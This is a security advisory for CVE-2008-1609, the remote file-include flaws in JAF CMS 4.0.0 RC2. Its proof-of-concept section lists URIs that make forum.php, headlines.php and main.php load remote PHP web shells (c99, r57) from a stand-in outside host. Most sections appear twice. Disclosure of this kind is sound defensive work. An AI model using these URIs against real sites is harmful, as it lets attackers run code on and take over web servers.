JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities
BID:28476
Info
JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 28476 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1609 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 27 2008 12:00AM |
| Updated: | May 07 2015 05:31PM |
| Credit: | XxX |
| Vulnerable: |
Salims Softhouse JAF CMS 4.0.0 RC2 |
| Not Vulnerable: | |
Discussion
JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities
JAF CMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
JAF CMS 4.0.0 RC2 is vulnerable; other versions may also be affected.
JAF CMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
JAF CMS 4.0.0 RC2 is vulnerable; other versions may also be affected.
Exploit / POC
JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities
Attackers may launch attacks through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/forum.php?website=http://www.example2.com/c99.txt?
http://www.example.com/forum.php?main_dir=http://www.example2.com/c99.txt?
http://www.example.com/headlines.php?website=http://www.example2.com/erne.txt?
http://www.example.com/headlines.php?main_dir=http://www.example2.com/r57.txt?
http://www.example.com/main.php?website=http://www.example2.com/c99.txt?
http://www.example.com/main.php?main_dir=http://www.example2.com/erne.txt?
Attackers may launch attacks through a browser.
The following proof-of-concept URIs are available:
http://www.example.com/forum.php?website=http://www.example2.com/c99.txt?
http://www.example.com/forum.php?main_dir=http://www.example2.com/c99.txt?
http://www.example.com/headlines.php?website=http://www.example2.com/erne.txt?
http://www.example.com/headlines.php?main_dir=http://www.example2.com/r57.txt?
http://www.example.com/main.php?website=http://www.example2.com/c99.txt?
http://www.example.com/main.php?main_dir=http://www.example2.com/erne.txt?
Solution / Fix
JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
JAF CMS 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities
References:
References: